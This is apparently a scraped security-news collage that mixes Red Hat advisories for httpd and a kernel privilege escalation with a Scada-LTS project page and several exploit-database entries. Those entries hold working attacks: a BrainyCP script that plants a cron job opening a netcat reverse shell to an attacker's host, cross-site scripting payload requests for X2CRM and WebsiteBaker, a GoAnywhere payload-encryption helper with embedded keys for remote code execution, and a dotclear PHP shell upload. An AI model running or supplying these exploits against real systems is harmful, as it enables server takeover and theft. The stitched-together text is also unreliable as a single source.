Red Hat Security Advisory 2023-1670-01 - The httpd packages provide the Apache HTTP Server, a powerful, efficient, and extensible web server.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: httpd and mod_http2 security update  
Advisory ID:       RHSA-2023:1670-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1670  
Issue date:        2023-04-06  
CVE Names:         CVE-2023-25690   
=====================================================================

1. Summary:

An update for httpd and mod_http2 is now available for Red Hat Enterprise  
Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

The httpd packages provide the Apache HTTP Server, a powerful, efficient,  
and extensible web server.

Security Fix(es):

* httpd: HTTP request splitting with mod_rewrite and mod_proxy  
(CVE-2023-25690)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the updated packages, the httpd daemon will be restarted  
automatically.

5. Bugs fixed (https://bugzilla.redhat.com/):

2176209 - CVE-2023-25690 httpd: HTTP request splitting with mod_rewrite and mod_proxy

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
httpd-2.4.53-7.el9_1.5.src.rpm  
mod_http2-1.15.19-3.el9_1.5.src.rpm

aarch64:  
httpd-2.4.53-7.el9_1.5.aarch64.rpm  
httpd-core-2.4.53-7.el9_1.5.aarch64.rpm  
httpd-core-debuginfo-2.4.53-7.el9_1.5.aarch64.rpm  
httpd-debuginfo-2.4.53-7.el9_1.5.aarch64.rpm  
httpd-debugsource-2.4.53-7.el9_1.5.aarch64.rpm  
httpd-devel-2.4.53-7.el9_1.5.aarch64.rpm  
httpd-tools-2.4.53-7.el9_1.5.aarch64.rpm  
httpd-tools-debuginfo-2.4.53-7.el9_1.5.aarch64.rpm  
mod_http2-1.15.19-3.el9_1.5.aarch64.rpm  
mod_http2-debuginfo-1.15.19-3.el9_1.5.aarch64.rpm  
mod_http2-debugsource-1.15.19-3.el9_1.5.aarch64.rpm  
mod_ldap-2.4.53-7.el9_1.5.aarch64.rpm  
mod_ldap-debuginfo-2.4.53-7.el9_1.5.aarch64.rpm  
mod_lua-2.4.53-7.el9_1.5.aarch64.rpm  
mod_lua-debuginfo-2.4.53-7.el9_1.5.aarch64.rpm  
mod_proxy_html-2.4.53-7.el9_1.5.aarch64.rpm  
mod_proxy_html-debuginfo-2.4.53-7.el9_1.5.aarch64.rpm  
mod_session-2.4.53-7.el9_1.5.aarch64.rpm  
mod_session-debuginfo-2.4.53-7.el9_1.5.aarch64.rpm  
mod_ssl-2.4.53-7.el9_1.5.aarch64.rpm  
mod_ssl-debuginfo-2.4.53-7.el9_1.5.aarch64.rpm

noarch:  
httpd-filesystem-2.4.53-7.el9_1.5.noarch.rpm  
httpd-manual-2.4.53-7.el9_1.5.noarch.rpm

ppc64le:  
httpd-2.4.53-7.el9_1.5.ppc64le.rpm  
httpd-core-2.4.53-7.el9_1.5.ppc64le.rpm  
httpd-core-debuginfo-2.4.53-7.el9_1.5.ppc64le.rpm  
httpd-debuginfo-2.4.53-7.el9_1.5.ppc64le.rpm  
httpd-debugsource-2.4.53-7.el9_1.5.ppc64le.rpm  
httpd-devel-2.4.53-7.el9_1.5.ppc64le.rpm  
httpd-tools-2.4.53-7.el9_1.5.ppc64le.rpm  
httpd-tools-debuginfo-2.4.53-7.el9_1.5.ppc64le.rpm  
mod_http2-1.15.19-3.el9_1.5.ppc64le.rpm  
mod_http2-debuginfo-1.15.19-3.el9_1.5.ppc64le.rpm  
mod_http2-debugsource-1.15.19-3.el9_1.5.ppc64le.rpm  
mod_ldap-2.4.53-7.el9_1.5.ppc64le.rpm  
mod_ldap-debuginfo-2.4.53-7.el9_1.5.ppc64le.rpm  
mod_lua-2.4.53-7.el9_1.5.ppc64le.rpm  
mod_lua-debuginfo-2.4.53-7.el9_1.5.ppc64le.rpm  
mod_proxy_html-2.4.53-7.el9_1.5.ppc64le.rpm  
mod_proxy_html-debuginfo-2.4.53-7.el9_1.5.ppc64le.rpm  
mod_session-2.4.53-7.el9_1.5.ppc64le.rpm  
mod_session-debuginfo-2.4.53-7.el9_1.5.ppc64le.rpm  
mod_ssl-2.4.53-7.el9_1.5.ppc64le.rpm  
mod_ssl-debuginfo-2.4.53-7.el9_1.5.ppc64le.rpm

s390x:  
httpd-2.4.53-7.el9_1.5.s390x.rpm  
httpd-core-2.4.53-7.el9_1.5.s390x.rpm  
httpd-core-debuginfo-2.4.53-7.el9_1.5.s390x.rpm  
httpd-debuginfo-2.4.53-7.el9_1.5.s390x.rpm  
httpd-debugsource-2.4.53-7.el9_1.5.s390x.rpm  
httpd-devel-2.4.53-7.el9_1.5.s390x.rpm  
httpd-tools-2.4.53-7.el9_1.5.s390x.rpm  
httpd-tools-debuginfo-2.4.53-7.el9_1.5.s390x.rpm  
mod_http2-1.15.19-3.el9_1.5.s390x.rpm  
mod_http2-debuginfo-1.15.19-3.el9_1.5.s390x.rpm  
mod_http2-debugsource-1.15.19-3.el9_1.5.s390x.rpm  
mod_ldap-2.4.53-7.el9_1.5.s390x.rpm  
mod_ldap-debuginfo-2.4.53-7.el9_1.5.s390x.rpm  
mod_lua-2.4.53-7.el9_1.5.s390x.rpm  
mod_lua-debuginfo-2.4.53-7.el9_1.5.s390x.rpm  
mod_proxy_html-2.4.53-7.el9_1.5.s390x.rpm  
mod_proxy_html-debuginfo-2.4.53-7.el9_1.5.s390x.rpm  
mod_session-2.4.53-7.el9_1.5.s390x.rpm  
mod_session-debuginfo-2.4.53-7.el9_1.5.s390x.rpm  
mod_ssl-2.4.53-7.el9_1.5.s390x.rpm  
mod_ssl-debuginfo-2.4.53-7.el9_1.5.s390x.rpm

x86_64:  
httpd-2.4.53-7.el9_1.5.x86_64.rpm  
httpd-core-2.4.53-7.el9_1.5.x86_64.rpm  
httpd-core-debuginfo-2.4.53-7.el9_1.5.x86_64.rpm  
httpd-debuginfo-2.4.53-7.el9_1.5.x86_64.rpm  
httpd-debugsource-2.4.53-7.el9_1.5.x86_64.rpm  
httpd-devel-2.4.53-7.el9_1.5.x86_64.rpm  
httpd-tools-2.4.53-7.el9_1.5.x86_64.rpm  
httpd-tools-debuginfo-2.4.53-7.el9_1.5.x86_64.rpm  
mod_http2-1.15.19-3.el9_1.5.x86_64.rpm  
mod_http2-debuginfo-1.15.19-3.el9_1.5.x86_64.rpm  
mod_http2-debugsource-1.15.19-3.el9_1.5.x86_64.rpm  
mod_ldap-2.4.53-7.el9_1.5.x86_64.rpm  
mod_ldap-debuginfo-2.4.53-7.el9_1.5.x86_64.rpm  
mod_lua-2.4.53-7.el9_1.5.x86_64.rpm  
mod_lua-debuginfo-2.4.53-7.el9_1.5.x86_64.rpm  
mod_proxy_html-2.4.53-7.el9_1.5.x86_64.rpm  
mod_proxy_html-debuginfo-2.4.53-7.el9_1.5.x86_64.rpm  
mod_session-2.4.53-7.el9_1.5.x86_64.rpm  
mod_session-debuginfo-2.4.53-7.el9_1.5.x86_64.rpm  
mod_ssl-2.4.53-7.el9_1.5.x86_64.rpm  
mod_ssl-debuginfo-2.4.53-7.el9_1.5.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-25690  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZDBH29zjgjWX9erEAQhFpw/9HSLo3H9yk8KOpnyrtD9alhqGMI4Uvw1O  
a6fRfNs6bD0ru8xdVJDjpXGOKTOgMW6p/zr789oAurWoEFr78mxPF68aliHjIA2v  
nvUNQtnvQmrGcVIWqbd0ANxBn9RMTnq7UoHLIkrbOwvpaKeb3cDPjry75qcjMaY0  
59wDL+dAUg00uZnQTSMr31wT+LxyKOKwRQqGF5Jyrd8Hcctwg2K01fcHh6Cu15Hn  
TDKGj2hdOXYqkaO09UxxwAh2GzZiJLA/oxp+RnbZzmKkgoezS7CBLLkVjJBRwf3r  
uyFFgSZqntzx2oXoOGMqiMSwFcN9c9f0Ga2i8/BBMAYeNNGHyTIp/tXGUBjZDgdc  
Ti8EA0MijRynkwAhEdXDO0u42iA9aGNsDy0ny0CykaGwi4RRu1dJRAM7z3oXkrnm  
dl3ZSjqA0jWGkP0419sPaLubmLXz0gYsayFSu9HwuvaDwxF6hn7wGAhVVTq5thQJ  
NyOGWCNEvVq5M7er4aYlU4blz/iQOSlDWUjMLjGKZJ70K7yuVpFzg0Hol/EOAfqZ  
DvgYTVBOJ0SIoEgdG6emyuSWqZ7pGfDPEE+Yo3YUKWMXKBR6Gw+eIUs6mwX7GGG1  
LtSP/q1u8dyPcXB1V+3D7Hgc/6vxR/ZXoWOrrdA6LaRVPAA4nupO7NpqImNz0sa2  
z+8/qJuTlfY=  
=zwk7  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1670-01

BrainyCP version 1.0 suffers from a remote code execution vulnerability.

    # Exploit Title: BrainyCP V1.0 - Remote Code Execution# Date: 2023-04-03# Exploit Author: Ahmet Ümit BAYRAM# Vendor Homepage: https://brainycp.io# Demo: https://demo.brainycp.io# Tested on: Kali Linux# CVE : N/Aimport requests# credentialsurl = input("URL: ")username = input("Username: ")password = input("Password: ")ip = input("IP: ")port = input("Port: ")# login session = requests.Session()login_url = f"{url}/auth.php"login_data = {"login": username, "password": password, "lan": "/"}response = session.post(login_url, data=login_data)if "Sign In" in response.text:    print("[-] Wrong credentials or may the system patched.")    exit()# reverse shell reverse_shell = f"nc {ip} {port} -e /bin/bash"# requestadd_cron_url = f"{url}/index.php?do=crontab&subdo=ajax&subaction=addcron"add_cron_data = {    "cron_freq_minutes": "*",    "cron_freq_minutes_own": "",    "cron_freq_hours": "*",    "cron_freq_hours_own": "",    "cron_freq_days": "*",    "cron_freq_days_own": "",    "cron_freq_months": "*",    "cron_freq_weekdays": "*",    "cron_command": reverse_shell,    "cron_user": username,}response = session.post(add_cron_url, data=add_cron_data)print("[+] Check your listener!")

BrainyCP 1.0 Remote Code Execution

X2CRM versions 6.6 and 6.9 suffer from multiple cross site scripting vulnerabilities.

    # Exploit Title: X2CRM v6.6/6.9 - Stored Cross-Site Scripting (XSS) (Authenticated)# Exploit Author: Betul Denizler# Vendor Homepage: https://x2crm.com/# Software Link: https://sourceforge.net/projects/x2engine/# Version: X2CRM v6.6/6.9# Tested on: Ubuntu Mate 20.04# Vulnerable Parameter: Actions[subject]# CVE: CVE-2022-48178# Date: 27.12.2022'''POC REQUEST:========POST /c2xrm/x2engine/index.php/actions/update?id=1 HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 172Origin: http://localhostConnection: closeReferer: http://localhost/c2xrm/x2engine/index.php/actions/viewAction?id=1Cookie: LoginForm[username]=admin; LoginForm[rememberMe]=1; PHPSESSID=kg3n7kcjqtm29fc7n4m72m0bt5; YII_CSRF_TOKEN=e5d14327e116fe92a5feb663d52e0920f1a4adab; 5d8630d289284e8c14d15b14f4b4dc28=779a63cb39d04cca59b4a3b9b2a4fad817930211a%3A4%3A%7Bi%3A0%3Bs%3A1%3A%224%22%3Bi%3A1%3Bs%3A5%3A%22test2%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A0%3A%7B%7D%7D; d9ee490d05f512911c1c4614c37db2b8=15982c76efa545e0e6fcd167baa86541c1ef91eda%3A4%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A0%3A%7B%7D%7D; sessionToken=Ncr7UIvK2yPvHzZc8koNW4DaIXxwZnsrSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originYII_CSRF_TOKEN=e5d14327e116fe92a5feb663d52e0920f1a4adab&Actions%5Bsubject%5D=%3Cscript%3Ealert(1)%3C%2Fscript%3E&Actions%5Bpriority%5D=1&Actions%5BactionDescription%5D=testEXPLOITATION========1. Create an action2. Inject payload to the vulnerable parameter in POST requestPayload: %3Cscript%3Ealert(1)%3C%2Fscript%3E'''# Exploit Title: X2CRM v6.6/6.9 - Reflected Cross-Site Scripting (XSS) (Authenticated)# Exploit Author: Betul Denizler# Vendor Homepage: https://x2crm.com/# Software Link: https://sourceforge.net/projects/x2engine/# Version: X2CRM v6.6/6.9# Tested on: Ubuntu Mate 20.04# Vulnerable Parameter: model# CVE: Use CVE-2022-48177# Date: 27.12.2022'''POC REQUEST:========GET /x2crm/x2engine/index.php/admin/importModels?model=asd%22%3E%3Cbody%20onload=%22alert(4)%22%3E HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeCookie: LoginForm[username]=admin; LoginForm[rememberMe]=1; PHPSESSID=959fpkms4abdhtresce9k9rmk3; YII_CSRF_TOKEN=e5d14327e116fe92a5feb663d52e0920f1a4adab; d9ee490d05f512911c1c4614c37db2b8=15982c76efa545e0e6fcd167baa86541c1ef91eda%3A4%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A0%3A%7B%7D%7D; locationTrackingFrequency=60; locationTrackingSwitch=1; 5d8630d289284e8c14d15b14f4b4dc28=15982c76efa545e0e6fcd167baa86541c1ef91eda%3A4%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A0%3A%7B%7D%7D; sessionToken=FFWkdliSAKgtUbP1dKP4iswyYRelqyQ4Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: noneSec-Fetch-User: ?1EXPLOITATION========1. Select Import Records Model in admin settings2. Inject payload to the vulnerable parameter in GET requestPayload: "><body onload="alert(4)">'''

X2CRM 6.6 / 6.9 Cross Site Scripting

Goanywhere Encryption Helper version 7.1.1 suffers from a remote code execution vulnerability.

    // Exploit Title: Goanywhere Encryption helper 7.1.1 - Remote Code Execution (RCE)// Google Dork:  title:"GoAnywhere" // Date: 3/26/2023// Exploit Author: Youssef Muhammad// Vendor Homepage: https://www.goanywhere.com/// Software Link:  https://www.dropbox.com/s/j31l8lgvapbopy3/ga7_0_3_linux_x64.sh?dl=0// Version:  > 7.1.1 for windows / > 7.0.3 for Linux // Tested on: Windows, Linux// CVE : CVE-2023-0669// This script is needed to encrypt the serialized payload generated by the ysoserial tool in order to achieve Remote Code Execution import java.util.Base64;import javax.crypto.Cipher;import java.nio.charset.StandardCharsets;import javax.crypto.SecretKeyFactory;import javax.crypto.spec.PBEKeySpec;import javax.crypto.spec.IvParameterSpec;import javax.crypto.spec.SecretKeySpec;import java.nio.file.Files;import java.nio.file.Paths;public class CVE_2023_0669_helper {    static String ALGORITHM = "AES/CBC/PKCS5Padding";    static byte[] KEY = new byte[30];    static byte[] IV = "AES/CBC/PKCS5Pad".getBytes(StandardCharsets.UTF_8);    public static void main(String[] args) throws Exception {        if (args.length != 2) {            System.out.println("Usage: java CVE_2023_0669_helper <file_path> <version>");            System.exit(1);        }        String filePath = args[0];        String version = args[1];        byte[] fileContent = Files.readAllBytes(Paths.get(filePath));        String encryptedContent = encrypt(fileContent, version);        System.out.println(encryptedContent);    }    public static String encrypt(byte[] data, String version) throws Exception {        Cipher cipher = Cipher.getInstance(ALGORITHM);        KEY = (version.equals("2")) ? getInitializationValueV2() : getInitializationValue();        SecretKeySpec keySpec = new SecretKeySpec(KEY, "AES");        IvParameterSpec ivSpec = new IvParameterSpec(IV);        cipher.init(Cipher.ENCRYPT_MODE, keySpec, ivSpec);        byte[] encryptedObject = cipher.doFinal(data);        String bundle = Base64.getUrlEncoder().encodeToString(encryptedObject);        String v = (version.equals("2")) ? "$2" : "";        bundle += v;        return bundle;    }    private static byte[] getInitializationValue() throws Exception {        // Version 1 Encryption        String param1 = "go@nywhereLicenseP@$$wrd";        byte[] param2 = {-19, 45, -32, -73, 65, 123, -7, 85};        return SecretKeyFactory.getInstance("PBKDF2WithHmacSHA1").generateSecret(new PBEKeySpec(new String(param1.getBytes(), "UTF-8").toCharArray(), param2, 9535, 256)).getEncoded();    }    private static byte[] getInitializationValueV2() throws Exception {        // Version 2 Encryption        String param1 = "pFRgrOMhauusY2ZDShTsqq2oZXKtoW7R";        byte[] param2 = {99, 76, 71, 87, 49, 74, 119, 83, 109, 112, 50, 75, 104, 107, 56, 73};        return SecretKeyFactory.getInstance("PBKDF2WithHmacSHA1").generateSecret(new PBEKeySpec(new String(param1.getBytes(), "UTF-8").toCharArray(), param2, 3392, 256)).getEncoded();    }}

Goanywhere Encryption Helper 7.1.1 Remote Code Execution

WebsiteBaker version 2.13.3 suffers from a cross site scripting vulnerability.

    Exploit Title: WebsiteBaker v2.13.3 - Cross-Site Scripting (XSS)Application: WebsiteBakerVersion: 2.13.3Bugs:  Stored XSSTechnology: PHPVendor URL: https://websitebaker.org/pages/en/home.phpSoftware Link: https://wiki.websitebaker.org/doku.php/en/downloadsDate of found: 02.04.2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================steps: 1.Anyone who has the authority to create the page can do thispayload: %3Cimg+src%3Dx+onerror%3Dalert%281%29%3EPOST /admin/pages/add.php HTTP/1.1Host: localhostContent-Length: 137Cache-Control: max-age=0sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1Origin: nullContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: klaro=%7B%22klaro%22%3Atrue%2C%22mathCaptcha%22%3Atrue%7D; PHPSESSID-WB-0e93a2=pj9s35ka639m9bim2a36rtu5g9Connection: closeb7faead37158f739=dVhd_I3X7317NvoIzyGpMQ&title=%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&type=wysiwyg&parent=0&visibility=public&submit=Add2. Visit http://localhost/

WebsiteBaker 2.13.3 Cross Site Scripting

dotclear version 2.25.3 suffers from a remote shell upload vulnerability.

    Exploit Title: dotclear 2.25.3 - Remote Code Execution (RCE) (Authenticated)Application: dotclearVersion: 2.25.3Bugs:  Remote Code Execution (RCE) (Authenticated) via file uploadTechnology: PHPVendor URL: https://dotclear.org/Software Link: https://dotclear.org/downloadDate of found: 08.04.2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================While writing a blog post, we know that we can upload images. But php did not allow file upload. This time<?php echo system("id"); ?> I wrote a file with the above payload, a poc.phar extension, and uploaded it.We were able to run the php code when we visited your pagepoc request:POST /dotclear/admin/post.php HTTP/1.1Host: localhostContent-Length: 566Cache-Control: max-age=0sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: dcxd=f3bb50e4faebea34598cf52bcef38548b68bc1ccConnection: closepost_title=Welcome+to+Dotclear%21&post_excerpt=&post_content=%3Cp%3EThis+is+your+first+entry.+When+you%27re+ready+to+blog%2C+log+in+to+edit+or+delete+it.fghjftgj%3Ca+href%3D%22%2Fdotclear%2Fpublic%2Fpoc.phar%22%3Epoc.phar%3C%2Fa%3E%3C%2Fp%3E%0D%0A&post_notes=&id=1&save=Save+%28s%29&xd_check=ca4243338e38de355f21ce8a757c17fbca4197736275ba4ddcfced4a53032290d7b3c50badd4a3b9ceb2c8b3eed2fc3b53f0e13af56c68f2b934670027e12f4e&post_status=1&post_dt=2023-04-08T06%3A37&post_lang=en&post_format=xhtml&cat_id=&new_cat_title=&new_cat_parent=&post_open_comment=1&post_password=poc video : https://youtu.be/oIPyLqLJS70

dotclear 2.25.3 Shell Upload

An privilege escalation issue was discovered in Scada-LTS 2.7.1.1 build 2948559113 allows remote attackers, authenticated in the application as a low-privileged user to change role (e.g., to administrator) by updating their user profile.

*   
*   The Project
*   Specifications
*   Documentation
*   Downloads

Open Source software for Supervisory Control and Data Acquisition

Scada-LTS is an Open Source, web-based, multi-platform solution for building your own SCADA (Supervisory Control and Data Acquisiton) system.

It comes bundled with many years of experience in real-world SCADA applications for Energy, Water Distribution, Manufacturing Plants, Home Automation, Laboratories... you name it!

Scada-LTS includes everything you need to get started in a few minutes: Communication Protocols, the data acquisition engine, Alarms & Events, HMI Builder and much more.

Our goal is to provide a rock-solid solution for mission-critical applications, while sharing knowledge and benefitting from an international and ever-growing community.

**Technical Specifications**

**Software Architecture**

*   Developed in Java - Server will run in any Architecture (PC/Mac/Linux)
*   Released in .WAR (multi-platform) and Windows Installer
*   User interface runs from a standard web-browser. No client installation needed.
*   SOAP and REST API´s for custom integration.

**Standard Features**

*   Data Acquisition Engine (for many popular pushed and polled protocols)
*   Watchlist - see datapoints updating in realtime
*   Datasources and Datapoint Hierarchies - organize your data
*   Graphical Views Builder (also known as HMI: Human-Machine Interface)
*   Data Reports with charts
*   User-based access with detailed permission settings
*   Scripting Engine for on-the-fly value calculations, setpoints and commands issuing
*   Multi-language with English, Portuguese, Spanish... and more coming

**Communication Protocols**

*   Modbus TCP/IP
*   DNP3
*   IEC 101
*   OPC DA 2.0
*   ASCII Serial and File readers
*   HTTP Listeners
*   HTTP Receivers (Get/Post) with REGEX parser
*   SQL Connectors (pull data from legacy SCADA databases and other systems)
*   ... and more coming

**Parameters and license**

Price

Free (GPL license)

Annual Maintenance Fee

None

\# of Data Points

Unlimited

User Connections

Unlimited

Protocols

All supported (no restrictions)

REST API

Reports

Creating a data warehouse

Optional (to order)

**Documentation****Check Scada-LTS documentation on github**

Documentation

**Scada-LTS forum on Stack Overflow - Feel free to ask questions**

Forum

**See Scada-LTS on YouTube**

YouTube

CVE-2022-41976: Scada-LTS

An update for kpatch-patch is now available for Red Hat Enterprise Linux 9.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:
* CVE-2023-0386: A flaw was found in the Linux kernel, where unauthorized access to the execution of the setuid file with capabilities was found in the Linux kernel’s OverlayFS subsystem in how a user copies a capable file from a nosuid mount into another mount. This uid mapping bug allows a local user to escalate their privileges on the system.


Skip to navigation Skip to main content

**Utilities**

*   Subscriptions
*   Downloads
*   Containers
*   Support Cases

**Infrastructure and Management**

*   Red Hat Enterprise Linux
*   Red Hat Virtualization
*   Red Hat Identity Management
*   Red Hat Directory Server
*   Red Hat Certificate System
*   Red Hat Satellite
*   Red Hat Subscription Management
*   Red Hat Update Infrastructure
*   Red Hat Insights
*   Red Hat Ansible Automation Platform

**Cloud Computing**

*   Red Hat OpenShift
*   Red Hat CloudForms
*   Red Hat OpenStack Platform
*   Red Hat OpenShift Container Platform
*   Red Hat OpenShift Data Science
*   Red Hat OpenShift Online
*   Red Hat OpenShift Dedicated
*   Red Hat Advanced Cluster Security for Kubernetes
*   Red Hat Advanced Cluster Management for Kubernetes
*   Red Hat Quay
*   OpenShift Dev Spaces
*   Red Hat OpenShift Service on AWS

**Storage**

*   Red Hat Gluster Storage
*   Red Hat Hyperconverged Infrastructure
*   Red Hat Ceph Storage
*   Red Hat OpenShift Data Foundation

**Runtimes**

*   Red Hat Runtimes
*   Red Hat JBoss Enterprise Application Platform
*   Red Hat Data Grid
*   Red Hat JBoss Web Server
*   Red Hat Single Sign On
*   Red Hat support for Spring Boot
*   Red Hat build of Node.js
*   Red Hat build of Thorntail
*   Red Hat build of Eclipse Vert.x
*   Red Hat build of OpenJDK
*   Red Hat build of Quarkus

**Integration and Automation**

*   Red Hat Process Automation
*   Red Hat Process Automation Manager
*   Red Hat Decision Manager

All Products

Issued:

2023-04-10

Updated:

2023-04-10

**RHSA-2023:1681 - Security Advisory**

*   Overview
*   Updated Packages

**Synopsis**

Important: kpatch-patch security update

**Type/Severity**

Security Advisory: Important

**Red Hat Insights patch analysis**

Identify and remediate systems affected by this advisory.

View affected systems

**Topic**

An update for kpatch-patch is now available for Red Hat Enterprise Linux 9.  

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

**Description**

This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel.  

Security Fix(es):  

*   kernel: FUSE filesystem low-privileged user privileges escalation (CVE-2023-0386)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

**Affected Products**

*   Red Hat Enterprise Linux for x86\_64 9 x86\_64
*   Red Hat Enterprise Linux for Power, little endian 9 ppc64le

**Fixes**

*   BZ - 2159505 - CVE-2023-0386 kernel: FUSE filesystem low-privileged user privileges escalation

**Red Hat Enterprise Linux for x86\_64 9**

SRPM

kpatch-patch-5\_14\_0-162\_12\_1-1-3.el9\_1.src.rpm

SHA-256: 49afc2cd89257cc0e51ccb05dca5d617f5f93c2ed2c92ac2bcaf40dd6578522b

kpatch-patch-5\_14\_0-162\_18\_1-1-2.el9\_1.src.rpm

SHA-256: 1b05e11614d4826212f2e6f53e6219f739aeb6b47e7494152fea7733e34c904a

kpatch-patch-5\_14\_0-162\_22\_2-1-1.el9\_1.src.rpm

SHA-256: 89e8951458af7eed16e2b80b80a174fade77d763c9942e6168fbec12b82ce14f

kpatch-patch-5\_14\_0-162\_6\_1-1-4.el9\_1.src.rpm

SHA-256: a19b68f71dfa839602f2e0d73b181dbe1c56927d37c3035871ad898df467b48e

x86\_64

kpatch-patch-5\_14\_0-162\_12\_1-1-3.el9\_1.x86\_64.rpm

SHA-256: 33e805422d1a0cc45dd4877540de1fe4498f3184d70b208eda9c6c7a88c18b6d

kpatch-patch-5\_14\_0-162\_12\_1-debuginfo-1-3.el9\_1.x86\_64.rpm

SHA-256: f201b17acd5dc78b122a25964635d40f077e9ecad230d386c05ad224c6465cef

kpatch-patch-5\_14\_0-162\_12\_1-debugsource-1-3.el9\_1.x86\_64.rpm

SHA-256: c45a3e9a089834974a6a28b938af6229d825605f1bcdd897afd788d9f44a3f0b

kpatch-patch-5\_14\_0-162\_18\_1-1-2.el9\_1.x86\_64.rpm

SHA-256: 3364e30385a558e7d185a8b727b711461efbf41ca76bfcdcc61f89d1b69c298b

kpatch-patch-5\_14\_0-162\_18\_1-debuginfo-1-2.el9\_1.x86\_64.rpm

SHA-256: d7214d75933f95324f8b91d50d41b9dcc40160a00d74ef922d8f7f42de87fd74

kpatch-patch-5\_14\_0-162\_18\_1-debugsource-1-2.el9\_1.x86\_64.rpm

SHA-256: ad9cb8520c3553649a059e38fd3358e882cb394fa48b0a0cb1f54321b218cd3c

kpatch-patch-5\_14\_0-162\_22\_2-1-1.el9\_1.x86\_64.rpm

SHA-256: e531a7f89cdfa80f800db9ac8fa8ff7f9a3d5a2843ab3bade2d2d9519601383d

kpatch-patch-5\_14\_0-162\_22\_2-debuginfo-1-1.el9\_1.x86\_64.rpm

SHA-256: d3f7a39ab642b06878ee551d42bf4f372083ce998f981ce0741662d194a1a1eb

kpatch-patch-5\_14\_0-162\_22\_2-debugsource-1-1.el9\_1.x86\_64.rpm

SHA-256: 15cea3134166d949d297a038b5ab43b32059c2a043da96b536ccdfd88a32b699

